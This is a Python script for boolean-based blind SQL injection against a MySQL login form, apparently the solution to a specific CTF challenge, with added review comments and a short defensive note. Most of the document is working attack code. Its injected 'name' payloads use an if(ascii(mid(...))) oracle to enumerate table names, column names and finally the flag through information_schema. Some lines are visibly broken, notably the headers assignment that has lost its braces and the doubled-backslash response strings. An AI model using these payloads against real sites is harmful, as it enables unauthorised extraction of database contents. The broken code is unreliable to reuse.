SQL盲注脚本(MySQL)
#coding:utf-8
import urllib.request
import json
"""
SQL盲注脚本,适用于mysql数据库;CTF 0~1 SQL注入第二题
"""
class SqlBlindInjection(object):
    """Boolean-based blind SQL injection client for one CTF login endpoint (MySQL).

    The login form at ``self.url`` answers with one of two distinct JSON
    ``msg`` values depending on whether the injected ``if(...)`` condition was
    true or false. ``post()`` turns that difference into a boolean oracle and
    ``binary_search()`` drives it to recover a value one character at a time,
    about seven requests per character.

    Defensive note: the oracle exists only because the endpoint interpolates
    the ``name`` field into SQL and returns different failure messages for
    "wrong password" and "account does not exist". Parameterised queries remove
    the injection, a single generic failure message removes the side channel,
    and the long run of near-identical requests with a changing numeric
    threshold is an easy signature for request-rate monitoring.
    """
    def __init__(self):
        # Target endpoint of the CTF challenge (hard-coded; not configurable).
        self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php"
        # Response message when the injected condition is true
        # ("账号或密码错误", account or password wrong).
        # NOTE(review): as printed the backslashes are doubled, so this is the
        # literal text "\u8d26..." rather than the decoded message that
        # json.loads() produces; presumably an extraction artefact.
        self.TRUERTN = u"\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef"
        # Response message when the injected condition is false
        # ("账号不存在", account does not exist). Same doubled-backslash caveat.
        self.FALSERTN = u"\\u8d26\\u53f7\\u4e0d\\u5b58\\u5728"
        # Upper bound on recovered length: range(1, GUESSNUM) gives at most
        # 127 character positions.
        self.GUESSNUM = 128
        # Request headers.
        # NOTE(review): the dict braces appear to have been lost in
        # extraction; as printed this line is not valid Python.
        self.headers = 'Accept-Charset': 'utf-8', 'Content-Type': 'application/x-www-form-urlencoded'
    def post(self, url, data):
        """Send one POST and map the JSON ``msg`` field onto the oracle.

        Args:
            url: endpoint to post to (callers pass ``self.url``).
            data: URL-encoded form body as ``str``; encoded to bytes here.

        Returns:
            True if ``msg`` equals ``TRUERTN``, False if it equals
            ``FALSERTN``; implicitly None when it is neither (the caller
            treats None as falsy).

        Raises:
            Whatever ``urlopen()`` raises: the request itself is outside the
            ``try``, so HTTP and network errors propagate.

        A failure inside the ``try`` (undecodable JSON, missing ``msg`` key)
        is retried by recursing with the same request. There is no retry
        bound, so a persistently malformed response ends in RecursionError.
        """
        req = urllib.request.Request(url=url, data=data.encode(), headers=self.headers, method='POST')
        response = urllib.request.urlopen(req).read()
        try:
            # json.loads() accepts the raw bytes directly (Python 3.6+).
            json_rtn = json.loads(response)
            if json_rtn["msg"] == self.TRUERTN:
                return True
            elif json_rtn["msg"] == self.FALSERTN:
                return False
        except Exception as e:
            # Unbounded retry: see the docstring.
            return self.post(url, data)
    def binary_search(self, url, data):
        """Recover a string one character at a time through the oracle.

        Args:
            url: unused; every request is sent to ``self.url``.
            data: form-body template with two ``%d`` slots, filled with the
                1-based character position and the ASCII threshold that the
                injected condition compares with ``>``.

        Returns:
            The recovered string. The partial result is printed after every
            character, so progress is visible while the loop runs.
        """
        rtn = ""
        for i in range(1, self.GUESSNUM):
            # Search the printable ASCII range 32..127 for character i.
            # Invariant while the loop runs: start <= ascii(char) <= end,
            # since the oracle answers the question "ascii(char) > mid".
            start = 32
            end = 128
            mid = (start+end)//2
            while start < end:
                cdata = data%(i,mid,)
                if self.post(self.url, cdata):
                    start = mid + 1
                else:
                    end = mid
                mid = (start+end)//2
            # When the search collapses to the lower bound 32 the loop stops;
            # presumably because, past the end of the value, the probed
            # substring is empty and no threshold is ever exceeded, so 32
            # doubles as the end-of-string signal. A genuine space (32)
            # inside the value would stop recovery early as well.
            # NOTE(review): indentation was lost in extraction; the break is
            # placed at for-loop level here, the reading under which it acts
            # as a terminator rather than a no-op exit from the inner loop.
            if mid == 32:
                break
            rtn += chr(mid)
            print(rtn)
        return rtn
    def guess_table(self):
        """Recover the comma-joined table names of the current database.

        The template asks, position by position, whether the character of
        ``group_concat(table_name)`` from ``information_schema.tables`` for
        ``database()`` is above the threshold. The result is printed, not
        returned.
        """
        data = "name=admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#&pass=1"
        table_name = self.binary_search(self.url, data)
        print(table_name)
    def guess_cols(self):
        """Recover the comma-joined column names of table ``fl4g``.

        Same mechanism as ``guess_table()``, over
        ``information_schema.columns``; the table name is hard-coded to the
        value the previous step produced. Printed, not returned.
        """
        data = "name=admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),%d,1))>%d,1,0)#&pass=1"
        col_name = self.binary_search(self.url, data)
        print(col_name)
    def get_flag(self):
        """Recover ``flag`` from table ``fl4g`` and print it.

        Returns None; the caller's ``print()`` of this value therefore
        emits a trailing ``None``.
        """
        data = "name=admin' and if(ascii(mid((Select flag from fl4g),%d,1))>%d,1,0)#&pass=1"
        flag = self.binary_search(self.url, data)
        print(flag)
if __name__ == '__main__':
    # Script entry: the three recovery steps are run one at a time, each
    # feeding a hard-coded value into the next; only the last is active here.
    sql_blind_inection = SqlBlindInjection()
    # Step 1 (done, commented out): table name, which came back as "fl4g".
    #sql_blind_inection.guess_table()
    # Step 2 (done, commented out): column name, which came back as "flag".
    #sql_blind_inection.guess_cols()
    # Step 3: get_flag() prints the value itself and returns None, so this
    # print() adds a trailing "None" line.
    print(sql_blind_inection.get_flag())